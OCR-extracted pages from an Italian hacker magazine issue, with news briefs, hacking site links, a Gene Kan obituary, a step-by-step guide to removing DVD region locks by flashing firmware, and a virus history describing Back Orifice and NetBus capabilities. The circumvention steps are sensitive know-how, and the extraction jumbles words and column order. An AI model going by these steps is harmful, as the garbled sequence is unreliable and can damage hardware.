HOT!MP3 SU PS2

Su psxforum.com èpossibile scarica-

re un nuovo playerdi mp3 prodotto daParadox per PS2. Ilplayer ancora in fa-se beta, frutto diun accordo traParadox e Sony,sembrerebbe giàfunzionare inmodo egregio.Ulteriori infor-mazioni sonorintracciabilinel sito webdi Psxforum. K

“HOW TO BECOME AHACKER” IN ITALIANO

Per quanti sono interessati a diventare hac-ker un testo da non perdere è il documen-

to ��How To Become A Hacker� di Eric S. Ray-mond tradotto in italiano da Andrea Ferrares-so di Programmazione.it. Il testo, tradotto or-mai da qualche mese è possibile rintracciarloall�indirizzo http://www.programmazione.it/in-dex.php?entity=earticle&idArticle=666&ida-rea=28Per chi invece preferisse leggerlo nella suaversione originale, l�indirizzo èhttp://www.tuxedo.org/~esr/faqs/hacker-howto.html K

NEI PANNI DEI CATTIVI

Data Security, società formata da esperti disicurezza informatica, offre alle aziende e

agli enti pubblici un test che fornisce un�anali-si approfondita della sicurezza perimetrale. Itest vengono eseguiti in remoto, via Internet,dal Centro di Ricerca sulla Sicurezza Informa-tica con programmi e procedure per indivi-duare tutte le possibili vie d�accesso ai siste-mi. In questo modo, gli esperti si pongono nel-lo stesso punto di vista di un hacker che vo-lesse penetrare illegalmente.Per le aziende associate a Confindustria e perla Pubblica Amministrazione (comuni,province, regioni, aziende sanitarie e altri entipubblici) il primo Security Test è gratuito.I test possono essere richiesti all�indirizzowww.securitytest.it K

! E’ POSSIBILE INFETTARE 3 MILIONI DI SERVER IN 30 SECONDI!

Èquanto affermano degli analisti del set-tore nel documento �How to 0wn the In-

ternet in Your Spare Time� rintracciabile inversione integrale all�indirizzo: www.icir.o r g / v e r n / p a p e r s / c d c - u s e n i x -sec02/index.html. Tali studiosi affemanoappunto che adottando nuove tecniche diinfezione e diffusione è possibile infettareanche 3 milioni di server in mezzo minuto.Che ciò fosse realmente possibile è intuibi-le come, con tecniche adeguate, sia possi-bile diffondere dei virus a livello mondialein pochissimi minuti. K

I l nuovo aggiornamento di Windows XP(il famigerato Service Pack 1) conterrà

una patch che renderà molto più difficilecraccare il sistema operativo copiandoalcune dll della versione venduta alleazienda (che non prevede l'uso del mec-canismo di attivazione basato su doppiachiave). Finora era infatti abbastanza fa-cile copiare le dll della versione "sprotet-ta" e utilizzare così la versione per uten-ti finali senza dover attivare la propriacopia sui server Microsoft. Il SP1 inveceverificherà l'integrità e il numero di ver-

sione delle dll e, setrovasse qualcosache non va, impediràdi effettuare l'aggior-namento (ma non dicontinuare a usare ilprodotto craccato). Ancora non si sa percerto se Microsoft implementerà ulterio-ri meccanismi di autodifesa, come peresempio un controllo della chiave di atti-vazione, allo scopo di verificare che nonsia tra quelle circolate abbondantemen-te su Internet. K

I l vostro vicino di scrivania invita tuttele colleghe a vedere divertenti giochini

o salvaschermo insoliti e voi sotto sottovi rodete d’invidia? I vostri compagni di scuola vi mandanocontinuamente filmati via e-mail, ma ilvostro modem ci impiega due giorni ascaricare un video da 1 Mb?Oppure avete un collega che se la tira“che il computer lo sa usare solo lui” evolete fargli un bello scherzetto con unfalso virus? Problemi risolti!!!Dal 12 agosto troverete in edicola PCSmile, la nuova rivista, con un Cd-Rom in regalo pieno zeppo difilmati divertentissimi, giochirealizzati in Flash con cuisfidare i vostri colleghi, fintivirus (da usare conattenzione!), immagini sexy e

vignette umoristiche da utilizzare comesfondo del desktop o da inviare agliamici.Se non avete voglia di passareore in linea a scaricare tutto ciò che dipiù divertente circola in Rete, il 12agosto correte in edicola a comprarePC Smile!PC Smile è utilizzabile sia dagli utentiMacintosh, sia da quelli Windows.

Nell’ultima pagina di Hacker Journaltrovate un buono sconto di 1Europer l’acquisto del primo numero diPC Smile! K

! SCHERZI DA HACKER CON PC SMILE!

! MICROSOFT BLINDA WINDOWS XP

PCSmile

Page 9: Hacker.journal.n..6

10 | www.hackerjournal.it

by bye

HJ ha surfato per voi...

15 minuti di celebrità! Questi sono i vostriI classicidella Rete

www.autistici.orgNel manifesto del sito si legge “Periniziare, vogliamo tutto. Socializza-re saperi, senza fondare poteri”.Insieme al progetto gemellowww.inventati.org, il sito si propo-ne di supportare il diritto alla co-municazione, alla privacy e all’a-nonimato, e di facilitare lo scambiodelle proprie conoscenze e risorse.Per questo, allestisce strumenti erisorse come caselle di posta “sicu-re”, remailer anonimo, proxy, new-sgroup, e anche un nodo Freenet.Se decidete di usare qualcuno deiservizi, non dimenticate di passaredalla pagina “Manifesto”, dovetroverete le coordinate per effet-tuare una donazione per sostenereil progetto.

www.theblackwindow.6go.net

Vorrei promuovere il mio sito hacker, è molto ricco di cose inte-ressanti riguardanti l’hacking....perfavore visitatelo.

Alessandro

www.fuckinworld.org

Vi volevo segnalare quest’ot-timo sito, per favore segnate-lo nei vostri link, ne vale lapena. C’è di tutto, anche unforum frequentatissimo:

Alex De Large

www.pirati.tk

Saluto tutto lo staff di hac-kerjournal...avete fatto unsito “SUPER” spero che cre-sca sempre di più...vi scrivoquesta email perchè volevosegnalarvi il mio sito e il sitodi tutti i miei collaboratori:

PiratesZone

www.gnomixland.comGnomix è un po’ come una vecchiasoffitta dove c’è di tutto, ma biso-gna saperlo trovare. C’è molto ma-teriale relativo all’hacking, ma an-che raccolte di link sugli argomen-ti più vari (Mp3, sfondi scrivania,avvenenti modelle e gli immanca-bili loghi e suonerie). Cercandocercando, qualche chicca salta fuo-ri, anche se alcune scatole noncontengono quello che ci si aspetta(per ovvi motivi, i link morti sonouna costante nei siti di hacking).

Page 10: Hacker.journal.n..6

www.hackerjournal.it |11

siti; scegliete voi se tirarvela o vergognarvi I classicidella Rete

http://clanost.interfree.it

Ciao sono webmaster del sitodel Clan OST. Siamo unaneonata crew vi chiedo di se-gnalare il sito su HJ speran-do di ampliare la crew. Ci ri-uniamo in chat ogni sera al-le 21:30.

VladKazama

www.hackernet.tk

Salve carissima redazione diHacker Journal, se potete,inseritemi tra i vostri link,così potrei diffondere megliola cultura hack. Grazie in anticipo.

HackerNet

http://digilander.libero.it/System_BuG

Innanzi tutto vi devo fare i miei complimenti sulla rivista dato che èmolto bella. L’unica cosa che non mi piace molto sono tutte quelle im-magini di teschi e le copertine. Cmq a parte questo siete davvero fan-tastici!!!! Ora detto quello che volevo dire passo a segnalarvi l’url delmio sito e spero che lo metterete nei vostri link!!!!Grazie!!!! Ciao.

[*°System_BuG°*]

http://slashdot.orgSe in rete succede qualcosa che farumore, state pur sicuri che suslashdot se ne parla. Partito comesito di informazioni con commenti,slashdot è riuscito a conquistarsiun gran numero di utenti tra i piùqualificati: tecno guru, amministra-tori, dirigenti, sviluppatori softwa-re, e hacker “veri”, quelli che nonhanno bisogno di dichiararlo. Ognigiorno questo “popolo digitale” sicollega, sfoglia le notizie ma so-prattutto le commenta, con unacompetenza rara. Slashdot è cosìorientato verso il software liberoche tutto il software che gestisce ilsito è open source e liberamentescaricabile.

http://ildp.pluto.linux.itCercate documentazione su Linuxin Italiano? Smettete pure di cerca-re e andate a questa pagina delPluto Linux User Groups. Si trattainfatti della pagina ufficiale dell’I-talian Linux Documentation Pro-ject, e anche se il nome è inglese,contiene tutta la documentazioneitaliana esistente sul sistemaGNU/LInux: manuali, howto, gui-de, tutorial e chi più ne ha più nemetta. Risalendo di un ramo l’al-bero della directory, si trova il Plu-to, uno dei più antichi e numerosigruppi di utenti Linux.

Segnalate

i vostri si

ti a:

redazione@

hackerjournal.it

Page 11: Hacker.journal.n..6

ene Kan, considerato il porta-voce del gruppo che ha contri-buito allo sviluppo e alla diffu-sione di Gnutella, è morto suici-da nella sua casa di San Mateoin California. Un po’ perché se

lo meritava, un po’ per chiarire alcune ine-sattezze rimbalzate sulla rete, gli dedichia-mo questo spazio.

Pochi ricordano che Gnutella, uno dei pro-tocolli più rivoluzionari della rete, per lesue caratteristiche di decentralizzazionedella condivisione dei file, è stato partoritoin seno alla più grande multinazionale cheopera nel settore di Internet e della produ-zione artistica e musicale, AOL/Time War-ner. Il progetto è infatti stato concepito dalgruppo di programmatori di NullSoft,azienda che aveva già rilasciato program-mi innovativi come WinAmp e ShoutCast,rispettivamente per la riproduzione/codifi-ca di file Mp3 e per la loro diffusione instreaming su Internet. Nel maggio del1999 NullSoft è stata acquisita daAOL per 70 milioni di dollari. Cifrache, che anche nel periodo delle vacchegrasse di Internet, non era certo da sotto-valutare. Si può quindi immaginare conquanta sorpresa i vertici di AOL/Time War-ner abbiano reagito quando, nel marzo2000 hanno scoperto che i ragazzotti chesi erano appena portati in casa avevano ri-lasciato un protocollo e un programmache minacciava di minare fin dalle fonda-menta alcune delle attività più redditiziedel gruppo: la produzione musicale e cine-matografica. Gnutella permetteva in-fatti di condividere file di qualsiasitipo, Mp3 e video compresi, senzaalcuna possibilità di controllo cen-

trale. Un pericolo di cui sbarazzarsi al piùpresto: la sezione relativa a Gnutella del si-to di NullSoft è stata quindi chiusa nel girodi poche ore, per ordini ricevuti dall’alto.Ma era già troppo tardi. Tra gli “errori”compiuti dal team di sviluppo (errori dalpunto di vista di AOL, s’intende), ve ne èstato uno gravissimo. Pur se per poche ore,Gnutella era stato pubblicato come softwa-re Open Source, e quindi erano disponibilianche i codici sorgenti. Il vaso di pandoraera stato aperto, e non c’era alcun modo dirichiuderlo.

Proprio basandosi sui sorgenti della primaversione di Gnutella, Gene Kan e altri pro-grammatori hanno potuto mettere a puntoil protocollo e i software necessari, conti-nuando ovviamente a lasciare libero il co-dice per ulteriori sviluppi. Per le sue qualità,Gene è stato scelto come portavoce delgruppo, ed era lui ad apparire in intervistee programmi Tv, così come a conferenzepubbliche e premiazioni. Anche per que-sto, alla notizia della sua morte, molti titolisi riferivano a lui come al “padre di Gnu-tella”, sovrastimando probabilmente il suoruolo nella creazione del protocollo. Que-sto non significa però che Gene fosse solouna persona “tutta immagine e poca so-stanza”. Oltre a occuparsi dello svilup-po di Gnutella, ha infatti fondato In-fraSearch, azienda che si occupava disviluppare un motore di ricerca per retipeer to peer. La società è stata in seguitoacquisita da Sun Microsystems, e Genestesso è passato alle dipendenze dellamamma di Java. Negli ultimi mesi, Genelavorava infatti al progetto JXTA, col qualeSun Microsystems vuole portare il concettodel peer to peer sugli accessori più svariati(computer, telefoni, palmari eccetera). K

personaggio

LINK UTILI Il nuovo PrometeoLa storia dello sviluppatore appena

scomparso, che ha diffuso nel mondo il

protocollo Gnutella per lo scambio di file.

ADDIO AL GENIO INFELICE DELLA RETE: GENE KAN

12 | www.hackerjournal.it

>> L’apporto di Gene

Con Gnutella è possibilecondividere file suInternet, in modo molto

simile a quanto un tempo sifaceva con Napster e i brani informato MP3. I principalivantaggi di questo protocollosono la possibilità dicondividere file di qualsiasitipo, e il fatto di nondipendere da un’unico ente,azienda o server centrale, chepuò essere attaccato dalle casedi produzione così come èavvenuto per Napster e AudioGalaxy. Lo svantaggio è che larete Gnutella è molto piùframmentata: è però possibileche cercando un file non lo siriesca a trovare, anche sequesto è presente sull’harddisk di un altro utenteGnutella. Il sistema prevedeinfatti la presenza di tantesotto reti, formate da nodivicini tra di loro. Soloall’interno di una sottoretec’è un’alta probabilità ditrovare effettivamente il filecercato in tempi ragionevoli.

www.gnutella.comPrincipale sitosul protocollo ei vari progammi.

www.bearshare.comPopolare clientper Windows, recentementebiasimato per l’impiego diSpyware.

http://gtk-gnutella.sourceforge.netClient grafico per qualsiasiUnix che supporti le librerieGTK+ (in versione 1.2 osuperiore).

www.limewire.comClient scritto in Java, funzionacon Windows, Mac e Unix.

>> La vera storia di Gnutella

G

Page 12: Hacker.journal.n..6

un computer, dal software di riprodu-zione o dal sistema operativo). È evi-dente che, se si tratta di un’impostazio-ne software, questa può essere modifi-cata a piacimento, e –proprio come ac-cade con i codici per le gabole dei vi-deogiochi– su Internet hanno comin-ciato a circolare le sequenze di tasti dapigiare sul telecomando del DVD permodificare la zona impostata (per i let-tori DVD-ROM montati sui PC, esistonodei programmini che permettono di fa-re la stessa cosa). Sul finire degli anni 90 però, annusatal’aria che tirava, le majors hanno im-posto un’ulteriore limitazione ai pro-duttori di DVD: per poter ottenere dalDVD Forum le chiavi per decifrare i fil-mati, i produttori dovevano impegnarsia supportare una nuova tecnologia diprotezione, chiamata RPC2, che limi-tasse la possibilità di modificare l’areageografica del lettore in questione. Ilsistema RPC2, diventato obbligatorio apartire dal primo gennaio 2000, è unpo’ più sofisticato, ed è implementatonel lettore stesso; in ogni lettore DVDche utilizza questo sistema è presenteun contatore. Ogni volta che si mo-difica la zona, il contatore viene

aumentato di uno. Quando il con-tatore arriva a 5, la zona non èpiù modificabile se non da un centrodi assistenza del produttore. Ancheproduttore però ha a disposizione unnumero limitato di “azzeramenti” delcontatore; esauriti questi, il DVD èbloccato per sempre su una zona.

Anche in questo caso però, non è statomodificato l’hardware del lettore, masolo il suo software: i lettori RPC2 sonouguali a quelli RPC1 ma hanno un di-verso firmware (il software registrato inmemorie non volatili, necessario alfunzionamento interno di un apparec-chio). Quindi, se è possibile sosti-tuire il firmware conforme allespecifiche RPC2 con quello prece-dente, RPC1, si può avere un let-tore di DVD che non si blocca do-po cinque modifiche della zona.Manco a dirlo, sostituire il firmwareRPC2 con la precedente versione RPC1è possibile, e nemmeno troppo compli-cato. Su Internet si trovano collezioni di

Videolettori di tutto il mondo, Unitevi!

Le majors decidono che un certo film lo può vedere un americano ma non un europeo,

un africano o un indiano. Se anche a voi questo non piace, e volete forzare questo

“embargo culturale”, leggete qui!

Di tutte le limitazioni all’uti-lizzo di un DVD Video impo-ste dalle case di produzio-ne, la più odiosa e appa-rentemente insulsa è quellache riguarda la zona geo-

grafica in cui è possibile vedere il film.Alla faccia del libero mercato e della li-bera circolazione della cultura, le ma-jors di Hollywood hanno suddivi-so il mondo in sei aree geografi-che; i lettori DVD venduti in ogniarea non possono utilizzare i DVDvenduti nelle altre cinque zone. Sechiedete loro il perché di questa scelta,li sentirete bofonchiare qualcosa ri-guardo alla necessità di frenare la pi-rateria e cose simili, ma il vero punto èche le majors vogliono poter deci-dere quando e come (se non ad-dirittura “se”) un certo film deveessere visto dagli abitanti di unacerta regione. Questo permette loroper esempio di proiettare un film nellesale europee mesi dopo la sua uscitanegli Stati Uniti, senza che gli spettato-ri europei abbiano già visto il DVD,magari acquistato per posta proprionegli USA.Bisogna notare che non è assoluta-mente vietato acquistare un letto-re di DVD americano, africano ogiapponese per poter vedere ifilm venduti in quelle zone. Il do-ver comprare sei diversi lettori per po-ter vedere qualsiasi DVD regolarmenteacquistato e pagato, ci pare però unarichiesta un po’ troppo esosa.

Di uno stesso film, viene prodotto unDVD con una codifica differente perogni regione. Inizialmente, i lettori diDVD (nel senso di “meccanica” del let-tore) erano in grado di leggere i dischidi qualsiasi zona, e gli eventuali con-trolli venivano fatti a valle (nel caso di

N

VideoHack

13| www.hackerjournal.it

COME MODIFICARE IL CODICE REGIONALE DEI DVD

La mappa dell’impero digitale delle case di produzione cinematografica.Mai come in questi casi, è stato azzeccato il motto “Di-Vi-Di èt impera”.

>> Come Funziona la Protezione

>> Fatta la legge trovatol’inganno!

>>

Page 13: Hacker.journal.n..6

VideoHack

video (lettore hardware) o se viene effet-tuata da un programma (via software).Se il lettore è impostato su una zona spe-cifica, passate al punto 4.

Se la decodifica avvienevia software, l’impostazioneregionale può essere bypassa-ta usando programmi come

Dvd Genie (www.inmatrix.com) o DvdRegion Killer (http://digital-digest.com/dvd/ downloads/dvdrk.html), senzapreoccuparsi di altro, e impostare laregione 0.

Se la decodifica avviene viahardware, e il disco è “regionfree”, bisogna usare deiprogrammi che permet-

tano di cambiare le impostazionidi zona della scheda video senzaaumentare il contatore. Questi pro-

firmware vecchi ma meno schizzinosi diquelli attuali per quanto riguarda icambi di zona. Esistono firmware cherendono il lettore “region free” (senzapiù impostazioni di zona, e quindi ingrado di leggere DVD di qualsiasi re-gione), e altri che permettono di modi-ficare manualmente la zona senza le li-mitazioni imposte dai contatori.La fatica maggiore quindi consiste nel-l’individuare la marca e il modelloesatto del proprio lettore DVD (non ba-sta guardare la scatola, perché moltospesso lo stesso modello viene vendutocon marchi differenti), e nel trovare laversione giusta del firmware.

Prima che vi accingiate a fare qualsiasicosa con il vostro lettore DVD, voglia-mo avvisarvi che la modifica delfirmware è sempre un’operazionedelicata: se qualcosa dovesse andarestorto durante l’operazione (se salta lacorrente, si impalla il computer o il filedel firmware scaricato da Internet fossecorrotto), il lettore di DVD potrebbediventare inutilizzabile, e solo ilcentro di assistenza potrebbe ripararlo. La modifica al firmware inoltre invali-da la garanzia; se il lettore è statoacquistato da poco, pensateci due vol-te prima di rinunciare a un lungo pe-riodo di garanzia e supporto gratuito.

Come prima cosa, bisognaottenere informazioni sulproprio lettore di DVD.Questa operazione può essere

svolta con un programma comeCDVDInfo (http://digital-digest.com/dvd/downloads/cdvdinfo.html). Se il

programma rivela che il lettoreè “region free”, rimane da de-terminare se la decodifica av-

viene nellascheda

grammi variano a seconda del modellodi scheda video e si trovano all’indirizzohttp://digital-digest.com/dvd/arti-cles/region_hardware.html. Prima diusare un DVD Video, bisognerà control-lare la regione per cui è stato codificato,e modificare le impostazioni usando ilprogramma più appropriato.

Se il lettore non è “regionfree”, occorre fare in modoche lo diventi. Dopo aver verificato marca emodello esatti, andate all’in-

dirizzo http://digital-digest.com/dvd/downloads/firmware.html osul sito www.firmware.fr.st e scarica-te il file corrispondente. Per flashare(installare) il firmwa-re, potrebbe es-sere necessarioscaricare ancheun’utility, che sa-rà indicata nellapagina in que-stione). Non tutti ilettori possonoessere resi “re-gion free”; se il vo-stro non fosse nellalista, non ci sono soluzioni facilmentepraticabili (bisognerebbe cioè copiareogni singolo supportoDVD, eliminando la co-difica regionale).

>> All’opera

Flashare: modificare unfirmware, che solitamente èscritto in un tipo di memoriadefinita “memoria flash”.

?

13

I MAC E IL REGION CODE

14| www.hackerjournal.it

ATutte le cose dette per quanto ri-guarda Windows valgono ancheper Mac, con un’ovvia eccezione: iprogrammi citati sono solo perWindows. Niente paura: anche perMac (Classico e OS X) esiste tuttal’attrezzatura necessaria per libe-rare il proprio lettore di DVD. Tut-te le informazioni, gli strumentinecessari e le patch per il firmwa-re dei lettori DVD si possono facil-mente trovare su Internet. Uno deisiti migliori è The Mac DVD Re-source, che si trova all’indirizzowww.wormintheapple.gr/macdvd.

4

2

Page 14: Hacker.journal.n..6

Dopo aver scaricato il firm-ware ed eventualmente ilprogramma per la sua in-stallazione, procedete al-

l’aggiornamento (anzi, all’invecchia-mento), avendo curadi lavorare in con-dizioni di massi-ma sicurezza: leg-gete tutte le istru-zioni che trovate,uscite da tutti iprogrammi, e sec’è un tempora-le, forse è meglioche rimandate l’operazio-ne. Un inconveniente a que-sto punto renderà inutilizzabile ilvostro lettore.

Dopo aver cambiato le impo-stazioni hardware o software,conviene far riconoscere nuo-vamente il lettore DVD a Win-dows (che conserverà altri-

menti le impostazioni precedenti, impe-dendo comunque la visualizzazione diDVD di aree diverse). Se tutto è andatocome dovrebbe, potrete a questo punto

vedervi il vostro film preferito in-dipendentemente dall’a-

rea geografica percui è stato prodotto.

Ricordiamo ancorauna volta che l’ope-

razione è perfetta-mente legale, ma ren-

de nulla la garanzia dellettore. K

>>

5 RCE,L’ULTIMA TROVATADELLE MAJORSConsapevoli del fattoche i lettori possono es-sere taroccati (e che incerti casi vengono addi-rittura venduti già come“region free”, per esem-pio da www.zone-freedvd.com), la Mo-tion Picture Associationof American (MPAA) hasviluppato un nuovo si-stema, chiama-to RCE (RegionalCode Enhan-cing), che impe-disce la visua-lizzazione del DVDVideo sui lettori “re-gion free”. L’unico mo-do per aggirare la prote-zione è quello di impo-stare la zona prima di in-serire il DVD, ma questoovviamente può esserefatto solo con i lettoriRPC-1. In caso contra-rio, dopo cinque cambidi zona il lettore si bloc-cherà sull’ultima regioneimpostata. Attualmentel’RCE è implementatosolo sui DVD prodottiper la zona 1 (USA),e non si sa se verrà ap-plicato anche altrove.

AREA ZERONELLO SPAZIOGià da un paio di anni,sulla stazione spazialeinternazionale sono statiinstallati due lettori diDVD con area codeuguale a zero. Orbitan-do attorno alla terra, lapiattaforma infattinon rientra in alcunadelle zone previste.La mano lunga dellemultinazionali dell'intrat-tenimento non può arri-vare fin lassù.

PILLOLE

Con i lettori DVD da tavolo (quelli dacollegare alla TV, come un videoregi-stratore) ovvimente non è possibile met-tersi a pistolare con dei programmi percarpire le informazioni sulla meccanicaed eventualmente flashare il firmware,ma non tutto è perduto. Per risparmiare,i lettori DVD da tavolo vengono prodottitutti uguali, e poi viene impostato il codi-ce regionale in qualche modo. In molti casi è quindi possibile modificare questaimpostazione di volta in volta, o addirittura rendere il lettore “region free”. A voltepuò essere necessario aprire il lettore e spostare un interruttore o un jumper, mol-to spesso basta digitare una particolare combinazione di tasti sul telecomando. Incerti casi non c’è nulla da fare: l’operazione può essere fatta solo da un centro diassistenza. La situazione varia da marca a marca, e da modello a modello. Al so-lito, Internet si rivela una fonte inesauribile di informazione, Ecco un paio di siti danon perdere:

VCDHelp - DVD P layer Hackswww.vcdhelp.com/dvdplayershack.php Una lista piuttosto nutrita di modelli, ma i trucchi non sempre funzionano. Usatelicon cautela.

DVD Reviewer - Mult i Region Hackswww.dvd.reviewer.co.uk/info/multiregionEssendo un sito inglese, ha il pregio di elencare molti lettori con le sigle con cui sonovenduti in Europa (spesso diverse da quelle degli stes si lettori negli USA).

PER I LETTORI DA TAVOLO

www.hackerjournal.it |15

1

2

3

4

5

6

6

Page 15: Hacker.journal.n..6

Virus

l virus è un programma. Ilnome VIRUS deriva dal fat-to che tali programmi si au-toreplicano e sono quindi

costretti ad attaccarsi ad unaltro programma. In pratica la stessa cosache farebbe un virus biologico, che per in-fettare, replicarsi e vivere nel nostro orga-nismo ha bisogno di una cellula. I virus sono solitamente scritti da abili pro-grammatori, ma in Rete sì trovano ap-plicazioni che consentono, anche aimeno esperti di creare un virus com-plesso con pochi clic. Alcuni virus sono scritti solo per la vogliadel programmatore di mettersi alla prova,di “vedere se ne è capace” o di dimostra-re al mondo la loro bravura. Altri non so-no che uno scherzo. A volte intendono in-viare un messaggio di protesta o d’altrogenere. In realtà, solo pochi virus sonoscritti con lo scopo di provocare danni.

La storia di questo fenomeno nasce conl’inizio stesso dell’informatica:Nel 1959 tre programmatori dei BellLaboratories svilupparono “CoreWars”, un gioco in cui ognuno dei pro-grammatori scriveva dei programmi ingrado di riprodursi, nascondendoli nelcomputer. Ad un segnale convenuto, ognivirus cercava di riprodursi e distruggere glialtri virus. Alla fine vinceva colui che pote-

I

COME NASCONO E COME SI DIFFONDONO I VIRUS

Una breve storia di uno dei fenomeni più devastanti del lato oscuro

va vantare un maggior numero di virus ri-prodotti, cioè chi aveva creato il viruspiù potente. Nel 1970 nasceCreeper. Si tratta di un vi-rus creato da Bob Tho-mas diffuso nellarete ARPAnet. Ilvirus si presen-tava scrivendo avideo “I’mCreeper, catchme if you can!”.Negli anni 80nasce il primo Ca-vallo di Troia. Unprogrammatore creò unaversione di un famoso giocochiamato Animal, che durantel’esecuzione si riproduceva an-dandosi a porre in tutti i sistemicollegati. Lo scopo del programmatoreera di diffondere un nuovo metodo di dis-tribuzione del software chiamato “Pervasi-ve Release”. Quel tipo di programma pre-se il nome di “cavallo di Troia” per indica-re che conteneva al suo interno un agenteinfettivo Nel 1985 in Italia nasce Ping Pong,un virus che simpaticamente faceva com-parire sullo schermo una pallina, la qualerimbalzava producendo danni. Ping Pongproveniva dal Politecnico di Torino, nellostesso istituto universitario fu sviluppatal’utilità Devirus che individuava il codicePing Pong e lo eliminava. Nel 1986 viene alla luce Brain, un vi-rus che infettava il settore di boot delfloppy disk. Brain fu sviluppato in Pakistanda due fratelli, Basit e Amjad. Brain nonaveva un codice dannoso, ma si limitava ariprodursi su tutti i dischetti inseriti nel let-tore di un PC infetto modificandone l’eti-chetta con il testo “(c) Brain”. Nel 1990 la complessità dei virus fe-ce un passo in avanti. Furono creati,infatti, virus definiti polimorfi. Un hackernoto come Dark Avenger, distribuì il Muta-tion Engine; un programma che consenti-va a tutti di creare virus polimorfi. L’arri-vo di Windows 95 segnò un punto di

svol-ta. Inizia-

rono ad ap-parire i primi

virus capaci disfruttare le debolezze

di questo sistema opera-tivo.

Una vera e propria rivoluzioneavvenne quando si presentò una

minaccia quasi del tutto inattesa: quelladei virus macro. La prima infezione diquesto tipo ad entrare in libera circolazio-ne fu Word.Concept, che usava il lin-guaggio di programmazione di MicrosoftWord. Siccome lo stesso linguaggio discripting viene usato anche da altri pro-grammi Microsoft, primo tra tutti Outlooke la sua versione gratuita Outlook Express,hanno cominciato a diffondersi virus spe-cifici per la posta elettronica, che utilizzanoquesti programmi come veicolo di conta-gio. Sono quindi nati virus con una veloci-tà e una vastità di diffusione mai vista pri-ma: Melissa, I Love You e molti altri.

La tipologia di virus che più minaccia lanostra privacy è quella dei cavalli di Troia,o meglio una loro sotto-tipologia chiama-ta Backdoor Trojan. Sono costituti daun’applicazione di tipo client e da un ser-ver (che risiede sul computer infetto). La parte server può essere inserita all’in-terno di un qualsiasi file eseguibile e rap-presenta il file che sarà diffuso mediante

16| www.hackerjournal.it

>> La storia dei Virusinformatici

>> Trojan e Backdoor

Virus: il fenomeno

NetBus permette di prendere il totalecontrollo della macchina su cui vieneinstallata, quasi sempre a tradimento, laversione server del programma.

Page 16: Hacker.journal.n..6

>>

e-mail o attraverso un qualunque softwa-re Una volta attivata l’applicazione server,chi ha il client e le chiavi di accessopuò prendere il controllo completodella macchina server, ed efefttuareoperazioni di trasferimento file,controllo della rete, ricerca di pas-sword, apertura del lettore CD e de-cine di altre operazioni.

Le BackDoor più conosciute sono senzadubbio Back Orifice e NetBus. Back Orifice è una backdoor proget-tata per Windows e permette di pren-dere il controllo di una macchina. Gli in-trusi possono accedere al server di BOusando un’interfaccia testuale per Unix oun client grafico per Windows. Il server diBO permette agli intrusi di eseguire co-mandi, leggere file ed eseguire trasferi-menti di file da e verso la vostra macchina,modificare il registry, avviare e fermare iprocessi e tantissimi altri trucchi. NetBusconsente, tramite un semplice pan-nello di controllo, di svolgere le stes-se funzioni di BO ed altre ancora. Traqueste l’apertura del microfono del vostroPc, trasformandolo in una cimice cheascolta quello che state dicendo.

Per diminuire il rischio d’infezioni occorreistallare un antivirus e aggiornarlofrequentemente (almeno su base men-sile). Avere un antivirus non aggiornatoequivale a non averlo! E’ opportuno con-trollare periodicamente la presenza di vi-rus nel proprio computer, sottoponendo acontrollo qualsiasi CD o floppy di prove-nienza sospetta prima di eseguire uno deifile in esso contenuti. Non bisogna ese-guire mai programmi d’origine sco-

nosciuta. Controllare tsempre utti i file ches’immettono nel sistema, anche perché ladiffusione dei virus avviene mag-giormente con lo scambio di file traamici o per email. La posta elettronica èuno dei principali mezzi di diffusione di vi-rus: basta aprire il file infetto allegato a unmessaggio per essere contagiati. È oppor-tuno controllare sempre i file allegati conun programma antivirus. In particolare oc-corre controllare i file che presentano leestensioni: exe, dll, com, sys, vbx, pif, scr,ocx, vbs ed i file documento che possonocontenere anche macro: doc, xls, dot, xla.

Un metodo per difendersi da programmi diBackDoor Trojan è di istallare un buonprogramma di rilevazione e aggior-narlo frequentemente. Questo pro-gramma dovrebbe essere affiancato da unFireWall, che controlla rigorosamen-te tutti i programmi che tentano diaccedere ad Internet e segnala chi cer-ca di entrare nel nostro computer. Ovvia-mente, il sistema più sicuro di tutti è quellodi lasciare stare il Computer ed usare laMacchina da Scrivere!! K

Nazzareno Schettino - www.notrace.it

dell’hacking, con una descrizione delle tipologie principali di virus.

Euristica: una tecnologia antivirusche tiene sotto controllo alcuni sintomitipici della presenza di un virus comead esempio modifiche non previstenella dimensione del file.

?

www.hackerjournal.it |17

>> Come difendersi

Esistono vari tipi di virus informatici,catalogabili in base a come si compor-tano, sopravvivono, si autotrasmettonoe così via. Eccone un elenco:

BOOT SECTOR VIRUS: infettano la partedi un floppy o hard disk contenenteinformazioni necessarie all'avvio delsistema. La diffusione avviene general-mente quando si avvia un PC da unfloppy infetto.

FILE VIRUS: sono dei virus che infettanofile di programmi (con estensioni .exe,.com, ecc.) e si replicano ad ogni avviodel programma infetto.

MACRO VIRUS: è il tipo di virus più dif-fuso. In pratica è un programma scrittoin Visual Basic (VBA, ovvero Visual Ba-sic for Applications).

MULTIPARTITE VIRUS: per diffondersiutilizza una combinazione di tecniche.Il tipo più comune unisce il metodo dilavoro di un virus di boot e di file.

POLYMORPHIC VIRUS: è un virus chemuta ogni volta che si riproduce.

STEALTH VIRUS: utilizza vari trucchi pernascondersi e sfuggire ai software anti-

virus. In generale sono virus che infet-tano il DOS. Esistono molte varianti diquesto virus:

MBR STEALTH: questo virus infettal’MBR “master boot record” salvandouna copia del MBR originale che sosti-tuisce a quella infetta quando un anti-virus va a controllare la sezione deimaster boot record.

CLEAN ON-THE-FLY: questo virus inter-cetta tutte le operazioni di lettura sui fi-les. Se un antivirus legge un file infet-to, il virus intercetta l’operazione di let-tura e ripulisce il file rendendolo nor-male al controllo, una volta finita l’ope-razione il virus reinfetta il file.

TROJAN VIRUS: è un programma che alsuo interno contiene un sottocodicedannoso che si attivava al determinarsidi certe condizioni.

ZOO VIRUS: sono virus che vivono solonei laboratori di ricerca perché non so-no riusciti a diffondersi.

IN-THE-WILD VIRUS: sono dei virus chevivono allo stato selvaggio, cioè sonosfuggiti al controllo e sono attualmentein circolazione.

TIPOLOGIE DI VIRUS

della Distruzione

Page 17: Hacker.journal.n..6

TV SAT

COME NASCONO E COME SI DIFFONDONO I VIRUS

18| www.hackerjournal.it

Sono passati quasi due mesi dalla “Operazione

Nuova Smart Card”, e su Internet si parla solo di

La lunga battaglia fra TelepiùDigitale e gli Hackers sem-brerebbe conclusa. Nei corri-doi milanesi i tecnici dell’e-mittente televisiva sono fieridel lavoro svolto e sono con-

